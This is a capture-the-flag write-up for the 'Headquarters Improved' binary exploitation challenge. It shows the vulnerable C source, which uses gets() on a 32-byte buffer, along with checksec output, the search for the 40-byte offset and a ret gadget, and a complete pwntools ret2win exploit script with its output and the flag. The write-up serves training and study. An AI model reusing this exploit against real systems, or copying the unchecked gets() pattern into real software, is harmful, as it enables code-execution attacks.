Headquarters Improved

In the zip file, we are given a fake flag file, a binary and a source code file

└─# file *
flag:            ASCII text

headquarters2:   ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically 
                 linked, interpreter /lib64/ld-linux-x86-64.so.2, 
                 BuildID[sha1]=405527b137cdb2606c3e9d388dca0960ba70c686, for 
                 GNU/Linux 3.2.0, not stripped

headquarters2.c: C source, ASCII text

[...]
└─# cat flag
sctf{FAKE_FLAG}

Static analysis

Lets take a look at the c file

/*
Compile options:
    gcc headquarters2.c -o headquarters2 -fno-stack-protector -no-pie -D_FORTIFY_SOURCE=0
*/

#include <stdio.h>
#include <stdlib.h>

void admin()
{
    printf("Welcome admin.\n");
    puts("Here is your flag: ");
    system("cat flag");
}

int main()
{
    char name[32];

    printf("Welcome to Sieberrsec's headquarters!\n");
    printf("Enter your name: ");
    gets(name);

    printf("\nHello %s, welcome to Sieberrsec headquarters.\n",name);

    return 0;
}

We can see that there is an admin() function but no calls to it in main()

There is also a buffer overflow vulnerability at the gets() call

Protections

└─# pwn checksec headquarters2
[*] '/mnt/f/sieberrctf/PWN/headquartersimproved/headquarters2'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

The PIE and Canary bits are disabled, hence we are able to perform a ret2win attack

Finding buffer size

GDB

I will be using pwndbg as my debugger for this challenge

Firstly, lets generate a cyclic string of length 100

Next, lets run the program and input it into the name field

Whoops! We have got a segmentation fault. Lets inspect the value of ret that we overwritten

Our buffer size is 40

Retgadget

Due to a stack alignment issue known as the MOVAPs issue (https://ropemporium.com/guide.html, under common pitfalls), we shall add an extra ret gadget into our payload

Radare2

[0x004010b0]> /R ret
  0x0040100e             004885  add byte [rax - 0x7b], cl
  0x00401011         c07402ffd0  sal byte [rdx + rax - 1], 0xd0
  0x00401016           4883c408  add rsp, 8
  0x0040101a                 c3  ret  <--- the one we will be using
  [...]

Solve script

from pwn import *
context.binary = binary = ELF("./headquarters2")

p = process()
p = remote("challs.sieberr.live", 1004) # server location

hidden_function = p64(binary.symbols.admin)
retgadget = p64(0x40101a) 

payload = b"A" * 40 + retgadget + hidden_function

p.sendline(payload)

p.interactive()

└─# python3 solve.py
[*] '/mnt/f/sieberrctf/PWN/headquartersimproved/headquarters2'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Starting local process '/mnt/f/sieberrctf/PWN/headquartersimproved/headquarters2': pid 6674
[+] Opening connection to challs.sieberr.live on port 1004: Done
[*] Switching to interactive mode
Welcome to Sieberrsec's headquarters!
Enter your name:
Hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x1a@, welcome to Sieberrsec headquarters.
Welcome admin.
Here is your flag:
sctf{st0p_br34k1n9_1n_9uy5}
timeout: the monitored command dumped core
[*] Got EOF while reading in interactive
$

flag: sctf{st0p_br34k1n9_1n_9uy5}